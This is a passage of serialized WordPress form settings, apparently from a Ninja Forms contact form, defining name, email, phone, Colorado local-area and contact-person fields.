below.</p>\";s:3:\"key\";s:7:\"html_80\";s:15:\"container_class\";s:0:\"\";s:14:\"drawerDisabled\";b:0;s:11:\"field_label\";s:4:\"Text\";s:9:\"field_key\";s:7:\"html_80\";}s:2:\"id\";i:42;}i:1;a:2:{s:8:\"settings\";a:51:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:2;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:7:\"textbox\";s:6:\"def_id\";s:1:\"6\";s:5:\"label\";s:10:\"First Name\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:0:\"\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"1\";s:9:\"last_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:14:\"user_address_1\";s:0:\"\";s:14:\"user_address_2\";s:0:\"\";s:9:\"user_city\";s:0:\"\";s:8:\"user_zip\";s:0:\"\";s:10:\"user_phone\";s:0:\"\";s:10:\"user_email\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";i:1;s:3:\"key\";s:10:\"textbox_81\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:14:\"one-half first\";s:10:\"manual_key\";s:0:\"\";s:11:\"custom_mask\";s:0:\"\";s:11:\"field_label\";s:10:\"First Name\";s:9:\"field_key\";s:10:\"textbox_81\";s:21:\"custom_name_attribute\";s:0:\"\";s:23:\"personally_identifiable\";s:0:\"\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:43;}i:2;a:2:{s:8:\"settings\";a:48:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:3;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:8:\"lastname\";s:6:\"def_id\";s:1:\"7\";s:5:\"label\";s:9:\"Last Name\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:0:\"\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:14:\"user_address_1\";s:0:\"\";s:14:\"user_address_2\";s:0:\"\";s:9:\"user_city\";s:0:\"\";s:8:\"user_zip\";s:0:\"\";s:10:\"user_phone\";s:0:\"\";s:10:\"user_email\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";i:1;s:3:\"key\";s:11:\"lastname_82\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:8:\"one-half\";s:11:\"field_label\";s:9:\"Last Name\";s:9:\"field_key\";s:11:\"lastname_82\";s:21:\"custom_name_attribute\";s:5:\"lname\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:44;}i:3;a:2:{s:8:\"settings\";a:48:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:4;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:5:\"email\";s:6:\"def_id\";s:2:\"14\";s:5:\"label\";s:5:\"Email\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:0:\"\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"0\";s:9:\"last_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:14:\"user_address_1\";s:1:\"0\";s:14:\"user_address_2\";s:1:\"0\";s:9:\"user_city\";s:1:\"0\";s:8:\"user_zip\";s:1:\"0\";s:10:\"user_phone\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";i:1;s:3:\"key\";s:8:\"email_83\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:14:\"one-half first\";s:11:\"field_label\";s:5:\"Email\";s:9:\"field_key\";s:8:\"email_83\";s:21:\"custom_name_attribute\";s:5:\"email\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:45;}i:4;a:2:{s:8:\"settings\";a:51:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:5;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:5:\"phone\";s:6:\"def_id\";s:2:\"15\";s:5:\"label\";s:5:\"Phone\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:14:\"(999) 999-9999\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"0\";s:9:\"last_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:14:\"user_address_1\";s:1:\"0\";s:14:\"user_address_2\";s:1:\"0\";s:9:\"user_city\";s:1:\"0\";s:8:\"user_zip\";s:1:\"0\";s:10:\"user_email\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";i:1;s:3:\"key\";s:8:\"phone_84\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:8:\"one-half\";s:10:\"manual_key\";s:0:\"\";s:11:\"custom_mask\";s:0:\"\";s:11:\"field_label\";s:5:\"Phone\";s:9:\"field_key\";s:8:\"phone_84\";s:21:\"custom_name_attribute\";s:5:\"phone\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";i:46;}i:5;a:2:{s:8:\"settings\";a:30:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:6;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:10:\"listselect\";s:5:\"label\";s:15:\"Your Local Area\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"label_pos\";s:5:\"above\";s:9:\"list_type\";s:8:\"dropdown\";s:10:\"multi_size\";s:1:\"5\";s:15:\"list_show_value\";s:1:\"1\";s:4:\"list\";a:0:{}s:21:\"user_info_field_group\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:10:\"user_state\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";i:1;s:7:\"options\";a:8:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Boulder\";s:5:\"value\";s:7:\"Boulder\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:10:\"Co Springs\";s:5:\"value\";s:10:\"Co Springs\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:3;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:6:\"Denver\";s:5:\"value\";s:6:\"Denver\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:4;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Loveland\";s:5:\"value\";s:8:\"Loveland\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:5;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Western Slope\";s:5:\"value\";s:13:\"Western Slope\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:6;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:9:\"Northwest\";s:5:\"value\";s:9:\"Northwest\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:7;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:8:\"selected\";s:1:\"0\";s:5:\"label\";s:5:\"Other\";s:5:\"value\";s:5:\"Other\";s:4:\"calc\";s:0:\"\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}s:3:\"key\";s:13:\"listselect_85\";s:15:\"container_class\";s:14:\"one-half first\";s:11:\"field_label\";s:15:\"Your Local Area\";s:9:\"field_key\";s:13:\"listselect_85\";}s:2:\"id\";i:47;}i:6;a:2:{s:8:\"settings\";a:31:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:7;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:10:\"listselect\";s:5:\"label\";s:43:\"Select The Person You Would Like To Contact\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"label_pos\";s:5:\"above\";s:9:\"list_type\";s:8:\"dropdown\";s:10:\"multi_size\";s:1:\"5\";s:15:\"list_show_value\";s:1:\"1\";s:4:\"list\";a:0:{}s:21:\"user_info_field_group\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:10:\"user_state\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";i:1;s:7:\"options\";a:2:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:21:\"Initiator-Larry Dixon\";s:5:\"value\";s:21:\"Initiator-Larry Dixon\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}s:3:\"key\";s:57:\"select_the_person_you_would_like_to_contact_1613166999137\";s:15:\"container_class\";s:8:\"one-half\";s:11:\"field_label\";s:41:\"Select the person you would like to email\";s:9:\"field_key\";s:13:\"listselect_88\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";i:50;}i:7;a:2:{s:8:\"settings\";a:34:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:8;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:8:\"textarea\";s:5:\"label\";s:23:\"Enter Your Message 